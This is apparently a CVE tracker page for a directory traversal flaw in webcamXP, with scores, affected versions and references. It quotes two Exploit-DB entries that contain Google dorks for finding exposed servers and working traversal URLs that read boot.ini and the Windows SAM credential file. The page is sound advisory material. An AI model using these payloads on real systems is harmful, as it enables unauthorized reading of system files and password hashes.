CVE-2008-5862
published 2009-01-06CVE-2008-5862: Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410 build 2132 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot…
PriorityP336medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
5.91%
92.3th percentile
Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410 build 2132 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the URI.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webcamxp | webcamxp | — | — |
| webcamxp | webcamxp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WebcamXP and webcam 7 - Directory Traversal
exploitdb·2012-02-22
WebcamXP and webcam 7 - Directory Traversal
WebcamXP and webcam 7 - Directory Traversal
---
# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability
# Google Dork: "powered by webcamxp" xhtml css
# Google Dork: "powered by webcam 7"
# Date: 2/22/2012
# Author: Silent Dream
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32
# Tested on: Windows XP
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.
http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini
Exploit-DB
WebcamXP 5.3.2.375 - Remote File Disclosure
exploitdb·2008-12-19
CVE-2008-5862 WebcamXP 5.3.2.375 - Remote File Disclosure
WebcamXP 5.3.2.375 - Remote File Disclosure
---
Directory Traversal Attack
Example:
http://XX.XX.XX.XX/..%2F..%2F..%2F..%2F..%2Fwindows/repair/sam
http://XX.XX.XX.XX/..%2F..%2F..%2F..%2F..%2Fboot.ini
-nicx0
# milw0rm.com [2008-12-19]
No writeups or analysis indexed.
http://secunia.com/advisories/33257http://securityreason.com/securityalert/4877http://www.securityfocus.com/bid/32928http://www.securitytracker.com/id?1021484https://exchange.xforce.ibmcloud.com/vulnerabilities/47492https://www.exploit-db.com/exploits/7521http://secunia.com/advisories/33257http://securityreason.com/securityalert/4877http://www.securityfocus.com/bid/32928http://www.securitytracker.com/id?1021484https://exchange.xforce.ibmcloud.com/vulnerabilities/47492https://www.exploit-db.com/exploits/7521
2009-01-06
Published